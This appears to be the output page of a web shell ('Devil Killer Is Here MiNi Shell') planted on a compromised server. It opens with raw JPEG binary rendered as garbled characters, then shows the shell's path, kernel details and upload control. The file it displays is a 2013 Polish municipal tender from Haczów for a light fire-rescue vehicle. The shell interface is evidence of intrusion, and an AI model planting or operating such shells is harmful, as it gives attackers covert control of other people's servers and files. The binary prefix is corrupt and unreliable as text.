JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130314/102198-N-2013.html

<p class="kh_header"><b>Haczów: Dostawa fabrycznie nowego lekkiego  samochodu  pożarniczego przystosowanego  do  prowadzenia  działań w sytuacjach  nadzwyczajnych  zagrożeń  w wyniku  klęsk  żywiołowych , likwidacji  ich  skutków  dla  środowiska   dla jednostki  OSP  we  Wzdowie</b><br>
<b>Numer ogłoszenia: 102198 - 2013; data zamieszczenia: 14.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Haczów , Haczów 573, 36-213 Haczów, woj. podkarpackie, tel. 013 4391002, faks 013 4391696.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa fabrycznie nowego lekkiego  samochodu  pożarniczego przystosowanego  do  prowadzenia  działań w sytuacjach  nadzwyczajnych  zagrożeń  w wyniku  klęsk  żywiołowych , likwidacji  ich  skutków  dla  środowiska   dla jednostki  OSP  we  Wzdowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa fabrycznie nowego lekkiego  samochodu  pożarniczego przystosowanego  do  prowadzenia  działań w sytuacjach  nadzwyczajnych  zagrożeń  w wyniku  klęsk  żywiołowych , likwidacji  ich  skutków  dla  środowiska   dla jednostki  OSP  we  Wzdowie.  
Wymagania  ogólne:   Pojazd fabryczne  nowy  , rok  produkcji:  2012 lub 2013
I.  Typ Nadwozia
1.	samochód powinien być wyposażony w urządzenia sygnalizacyjno-ostrzegawcze świetlne i dźwiękowe oraz posiadać światła zewnętrzne zgodnie z wymaganiami odrębnych przepisów krajowych
2.	samochód należy wymalować:
-	nadwozie w kolorze czerwieni sygnałowej( RAL 3000),
-	zderzaki i błotniki w kolorze białym,
-	podwozie w kolorze czarnym
-	oznakowanie w taśmy odblaskowe po bokach z przodu i z tyłu pojazdu w kolorze biało- czerwonym

3.	Kabina blaszana, podwójna, z ilością miejsc siedzących dostosowaną do liczby członków załogi, każda część kabiny powinna być automatycznie oświetlana po otwarciu drzwi tej części; kabina na ramie podwójna kolor czerwony, podłoga oraz powierzchnie drzwi  i ścian kabiny  do wysokości 100 mm powinny być wyłożone wykładziną antypoślizgową, trwałą, łatwo zmywalną, która może być wykonana przez naniesienie powłoki.
W kabinie kierowcy powinny znajdować się następujące wskaźniki wizualne, wyraźnie widoczne z miejsca kierowcy i oznaczone za pomocą znormalizowanych piktogramów lub opisów:
-	Otwarcie drzwi zabudowy, rozkładanych stopni i wyposażenia, które jest zamontowane na stałe, ale po rozłożeniu zwiększa normalne wymiary pojazdu,
-	Podłączenia do zewnętrznego źródła zasilania
4.	Przeszklenie w części osobowej; przednia szyba powinna być wykonana jako warstwowa (klejona), pozostałe szyby powinny być wykonane przynajmniej ze szkła bezodpryskowego
5.	Przystosowany do przewozu min 7 osób wyposażony w co najmniej 4 drzwi 
6.	Drzwi powinny znajdować się po obu stronach kabiny. Drzwi przedziału  załogi  umieszczone  po  obu  stronach  pojazdu,   z tyłu  drzwi  lewe i prawe  przeszklone  przesuwne. Krawędzie drzwi powinny być oznakowane elementem odblaskowym lub światłem ostrzegawczym, zapalającym się w momencie otwarcia. Drzwi powinny umożliwiać odprowadzanie wody przedostającej  się do ich wnętrza. Drzwi kabiny powinny być zamykane kluczem, jednym do wszystkich zamków. Drzwi maksymalnie otwarte powinny pozostawać w tej samej pozycji. Przedział osobowy wyłożony tapicerką i podsufitką
7.	Przednie fotele wyposażone w bezwładnościowe pasy  bezpieczeństwa
8.	Siedzenia  pokryte materiałem łatwym do utrzymania w czystości, nienasiąkliwym, odpornym na ścieranie, antypoślizgowym, siedzenia wyposażone w zagłówki i bezwładnościowe pasy bezpieczeństwa. Wszystkie pasy dwupunktowe powinny być tego samego typu. Zapięcia wszystkich pasów bezpieczeństwa powinny wymagać identycznych czynności obsługowych.
Zawieszenie tylnej osi  wzmocnione poduszką powietrzną  zasilaną  pneumatyczne ze źródła  wewnętrznego.
II  Wyposażenie
1.	Elektrycznie regulowane szyby  boczne w kabinie kierowcy
2.	Poduszka  powietrzna dla kierowcy
3.	Centralny zamek  z pilotem na wszystkie drzwi
4.	Lusterka   sterowane elektrycznie, podgrzewane
5.	Zamontowany radioodtwarzacz CD
6.	Instalacja  wyposażona  w główny wyłącznik  prądu  odłączający wszystkie odbiorniki  z wyjątkiem wymagających stałego zasilania.
7.	Pojazd wyposażony w  gniazdo z wtyczka  do  ładowania akumulatorów ze źródła   zewnętrznego umieszczonego po lewej  stronie( sygnalizacja podłączenia do zewnętrznego źródła w kabinie kierowcy)
8.	Oświetlenie  przedziału  ładunkowego włączane z kabiny kierowcy i niezależnie z przedziału pasażerskiego
9.	Pojazd  wyposażony w sygnalizację  świetlną  i dźwiękową włączonego  biegu wstecznego. Jako sygnalizację świetlną dopuszcza się światło cofania (min zasięg 7m).
10.	Klimatyzacja  manualna  na  przedział  kabiny kierowcy i pasażerski
11.	Belka świetlna LED  z napisem STRAŻ
12.	Generator sygnałów świetlnych i dźwiękowych z możliwością podawania komunikatów głosowych
13.	Lampa błyskowa LED  koloru niebieskiego z tyłu samochodu
14.	Lampy przednie  błyskowe   LED  umieszczone na wysokości przednich lusterek samochodu osobowego lub schowane w zderzaku albo  grillu  pojazdu 
15.	Fala świetlna  z tyłu pojazdu wykonana  w technologii LED -8 elementowa  (po  bokach po jednym koloru niebieskiego, w  środku koloru pomarańczowego) sterowane z kabiny kierowcy
16.	Pojazd oznakowany w taśmy odblaskowe po  bokach pojazdu koloru żółtego oraz z przodu i tyłu pojazdu koloru biało-czerwonego
17.	Po  bokach,  z tyłu oraz na dachu pojazdu naklejony nr operacyjny 
18.	Na drzwiach przednich lewych i prawych naklejone oznaczenie jednostki OSP 
19.	Orurowanie zewnętrzne wzmacniające zderzak i zabezpieczające przednie światła 
20.	Wyciągarka elektryczna z prowadnicą rolkową o uciągu min. 3,5t, przy czym za uciąg uważa się siłę pracy mechanizmu wyciągarki.
21.	Radiotelefon samochodowy  o parametrach: częstotliwość VHF 136-174 MHz, moc 1÷25 W, odstęp międzykanałowy 12,5 kHz dostosowany do użytkowania w sieci MSWiA min. 128 kanałów, wyświetlacz alfanumeryczny min 14 znaków. Obrotowy potencjometr siły głosu.
22.	Oświetlenie przedziału pasażerskiego włączane z kabiny kierowcy 
23.	Oświetlenie przedziału ładunkowego włączane z kabiny kierowcy  i niezależnie z przedziału pasażerskiego.
24.	Dodatkowe gniazdo zapalniczki w kabinie kierowcy
25.	 Przenośna lampa halogenowa (szperacz) zasilana z gniazda zapalniczki 12V.
26.	Hak typu kulowego do przyczep o masie całkowitej nie przekraczającej 3500 kg, 
27.	Gniazdo elektryczne do przyczepy - znormalizowane gniazdo 12 V, 7-biegunowe, 
28.	Układ przeciwpoślizgowy ABS
29.	Układ  stabilizacji toru jazdy ESP
30.	Światła przeciwmgielne
31.	System ładowania akumulatora z automatycznym rozłączaniem podczas rozruchu samochodu.
III. Dopuszczalna masa całkowita  - do 3500 kg
IV. Ładowność pojazdu po wykonaniu zabudowy pożarniczej w przedziale załogi i przedziale sprzętowym: min. 700 kg
V. Rezerwa masy w pełni obciążonego samochodu w stosunku do całkowitej dopuszczalnej masy pojazdu: minimum 3 %
VI. Silnik:  Z zapłonem samoczynnym  turbodoładowany, spełniający normy czystości spalin  EURO 5  po pojemności  skokowej   nie większej niż 2200 cm 3
VII. Moc silnika  : Nie mniejsza  niż 130 KM
VIII. Moment obrotowy:  Nie mniej  niż 320 Nm   
IX. Skrzynia biegów: Mechaniczna, min 5-cio biegowa, zsynchronizowana
X. Napęd: na przednie koła
XI. Układ kierowniczy: Ze wspomaganiem
XII. Zabudowa furgonowa:
-	Zabudowa szkieletowa  z kształtowników ze stali  nierdzewnej z ramą pośrednią aluminiową  przykręcana  do ramy podwozia
-	Podłoga w przestrzeni pasażerskiej wyłożona materiałem łatwo zmywalnym , antypoślizgowym , wodoodpornym , ułatwiająca spływanie wody. Przegroda oddzielająca przedział  pasażerski  od sprzętowego.
Konstrukcja  przedziału z półkami  i mocowaniami na sprzęt.
Oświetlenie  w przedziale  sprzętowym  wykonane  w  technologii LED dające równomierne oświetlenie.
Uchwyty, klamki, rączki wszystkich urządzeń samochodu, szuflad i  tac powinny być zaprojektowane z uwzględnieniem ich obsługi w rękawicach. Powinno być zainstalowane oświetlenie obszaru  stanowisk obsługi samochodu. Powinno być zapewnione oświetlenie o natężeniu co najmniej 5lx w odległości 1m od pojazdu, na poziomie podłoża.
-	oświetlenie do czytania mapy powinno być zapewnione dla pozycji (miejsca) dowódcy w kabinie, o ile użytkownik nie ma innych wymagań.
-	Wszystkie włączniki i gniazda elektryczne znajdujące się na zewnątrz pojazdu powinny być dostępne max 2m.
-	szuflady, wysuwane podesty i tacy muszą się automatycznie blokować w pozycji zamkniętej i posiadać zabezpieczenie przed całkowitym wyciągnięciem (wypadnięciem z prowadnic). Po wysunięciu powinny się również automatycznie blokować, tak, żeby w celu ich wysunięcia trzeba było je świadomie odblokować , np. przez naciśnięcie przycisku (za wyjątkiem szuflad uchylnych). Szuflady i tace wystające w pozycji otwartej powyżej 250 mm poza obrys pojazdu muszą posiadać oznakowanie ostrzegawcze (paski folii odblaskowej na powierzchniach poprzecznych i wzdłużnych).
-	Dostęp  do sprzętu z zachowaniem  wymagań  ergonomii
-	Samochód powinien być wyposażony w uchwyty  do mocowania sprzętu w taki sposób, aby nie następowało jego przemieszczenie podczas jazdy, gwałtownego ruszania i hamowania, a jednocześnie sprzęt dawał się szybko i  łatwo wyjąć.
-	Podłoga w przestrzeni pasażerskiej wyłożona materiałem łatwo zmywalnym , antypoślizgowym , wodoodpornym , ułatwiająca spływanie wody.
-     Przegroda oddzielająca przedział  pasażerski  od sprzętowego.
-     Konstrukcja  przedziału z półkami  i mocowaniami na sprzęt.
-	Półki aluminiowe mocowane do stelaża z możliwością regulacji wysokości i miejscem na specjalistyczne wyposażenie pożarnicze:
-	motopompę M8 8 lub wysokociśnieniowy agregat wodny
-	lekki zestaw narzędzi hydraulicznych do ratownictwa technicznego,
-	piłę do betonu i stali,
-	piłę do drewna,
-	agregat prądotwórczy,  
-	pompę pływającą,
-	węże tłoczne W-52 i W-75 (min. 5 i 3 odc.)
-	prądownice
-	aparaty tlenowe z butlą
-	Oświetlenie  w warunkach słabej  widoczności min. 5 luksów w odległości 1 m od  pojazdu  na poziomie podłoża. Uruchamiane w kabinie kierowcy
-	Oświetlenie w przedziale sprzętowym  wykonane w technologii LED. Wyposażenie elektryczne znajdujące się wewnątrz pojazdu, które może być narażone na działanie wody powinno mieć stopień ochrony minimum IP 44.
-	pojemność akumulatora musi być odpowiednia do obciążenia elektrycznego instalacji kompletnego pojazdu, jednak nie mniejsza niż 88 Ah. Zasilanie z akumulatora powinno być realizowane przez podłączenie układu do zacisków akumulatora i - jeżeli jest to konieczne - z wykorzystaniem konwerterterów napięcia.
-	instalacja elektryczna zabudowy powinna być wyposażona w główny wyłącznik prądu, położony w zasięgu kierowcy. Wyłącznik powinien odłączać akumulator od wszystkich systemów elektrycznych, z wyjątkiem tych, które wymagają stałego zasilania. W tym przypadku instalacja powinna być wyposażona w urządzenie samoczynnie ograniczające prąd ładowania ww obwodów w przypadku nadmiernego rozładowania akumulatorów. Wyłączenie głównego wyłącznika prądu podczas pracy silnika nie powinno spowodować powstawania zaburzeń impulsowych większych niż 6V.
XIII. Wyposażenie dodatkowe pozostałe: 
-Maszt oświetleniowy 2x 500 W  teleskopowy, ręczny wyposażony w reflektory halogenowe zasilane z agregatu  prądotwórczego. Wysokość  masztu po  rozłożeniu od poziomu dachu do reflektorów nie mniej   niż 1,5 m. Stopień  ochronny  reflektorów  masztu minimum IP 55(wg PN-92 E-08106 
- Radiotelefon  samochodowy  o parametrach cz-ęstotliwość VHF136-174 MHz, moc 1-25 W, odstęp międzykanałowy 12,5 Khz  dostosowany  do użytkowania w sieci MSWiA min. 220 kanałów, Motorola GM 360 , lub o równoważnych parametrach
-Radiotelefon  nasobny  Motorola  GP 360 z ładowarką  lub inny o  równoważnych parametrach,

Uwaga: Parametry nie określone w powyższej specyfikacji muszą być zgodne z Wymaganiami dla samochodów ratowniczo-gaśniczych i samochodów ratownictwa technicznego przeznaczonych dla Ochotniczych Straży Pożarnych - Edycja druga - marzec 2006 lub Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. w sprawie wykazu wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów do użytkowania (Dz. U. Nr. 143 poz. 1002 z póź. Zm.). 
Pojazd musi posiadać świadectwo dopuszczenia CNBOP ważne na  dzień składania ofert.
XIV. Gwarancja:
1.	Gwarancja   na samochód  z wyposażeniem:  minimum na  dwa lata  bez limitu kilometrów liczona od daty odbioru przez Zamawiającego
2.	Gwarancja  na specjalistyczny  sprzęt pożarniczy zgodnie z warunkami producenta  dla danego sprzętu.
Cena brutto  ma zawierać podatek VAT -8%.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 35.00.00.00-4, 35.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu dokonania oceny  spełniania ww warunku niezbędne są:
a) Dokument potwierdzający  posiadanie  uprawnień  do  wykonywania określonej  działalności  lub czynności , jeżeli przepisy prawa nakładają  obowiązek ich  posiadania , w szczególności  koncesji  , zezwolenia  lub  licencji.  Jeżeli wykonawca  ma siedzibę  lub miejsce  zamieszkania  poza terytorium Rzeczypospolitej Polskiej , zamiast ww  dokumentu składa  dokument  lub  dokumenty   wystawione  w  kraju , w  którym  ma miejsce  zamieszkania  lub  siedzibę , potwierdzające odpowiednio, że posiada  uprawnienia do  wykonywania  działalności  związanej  z  przedmiotem  zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli wykaże się:
a) wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 dostaw  samochodów  pożarniczych  o zbliżonych parametrach.
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a)wykaz wykonanych  , a w przypadku świadczeń okresowych lub ciągłych  również  wykonywanych , głównych  dostaw  w okresie ostatnich trzech lat przed upływem terminu składania ofert albo  wniosków  o  dopuszczenie  do  udziału  w  postępowaniu  , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, , wraz z podaniem  ich  wartości , przedmiotu, dat  wykonania  i podmiotów na rzecz których  dostawy zostały  wykonane  oraz załączeniem dowodów czy  zostały wykonane  lub są wykonywane  należycie.
Dowodami są; poświadczenie , z tym, że w odniesieniu  do  nadal wykonywanych dostaw okresowych  lub ciągłych poświadczenie  powinno  być wydane nie wcześniej  niż na  3 miesiące przed upływem terminu  składania ofert. Jeżeli  z  uzasadnionych przyczyn o obiektywnym charakterze  wykonawca nie jest  w  stanie  uzyskać poświadczenia, składa oświadczenie.
W przypadku gdy zamawiający jest podmiotem  na rzecz którego  dostawy  wskazane  w  wykazie  zostały wcześniej  wykonane, wykonawca nie ma  obowiązku przedkładania  dowodów  wyżej wymienionych.  
W miejsce poświadczeń  jako dowodów , że usługi  zostały wykonane  należycie, dopuszcza się przedkładanie dokumentów potwierdzających należyte  wykonanie dostaw  i ich prawidłowe  ukończenie  określone w § 1 ust. 2 pkt 1 rozporządzenia Prezesa Rady Ministrów z dnia  30 grudnia  2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane. (Dz. U. Nr 226 , poz. 1817)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca dysponuje potencjałem technicznym do wykonania zamówienia, jeżeli:
a) dysponuje lub  dysponował będzie  sprzętem adekwatnym do wykonania niniejszego zamówienia.
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a) wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy   dostaw  w celu wykonania zamówienia wraz z informacją o podstawie dysponowania  tymi zasobami;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, jeżeli:
a) dysponuje lub dysponował będzie  osobami do wykonania zamówienia 
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a) wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek udziału w postępowaniu, jeżeli:
	a) wykonawca posiada (dysponuje) na rachunku bankowym środkami pieniężnymi (lub posiada zdolność kredytową) 
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków   udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a)informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

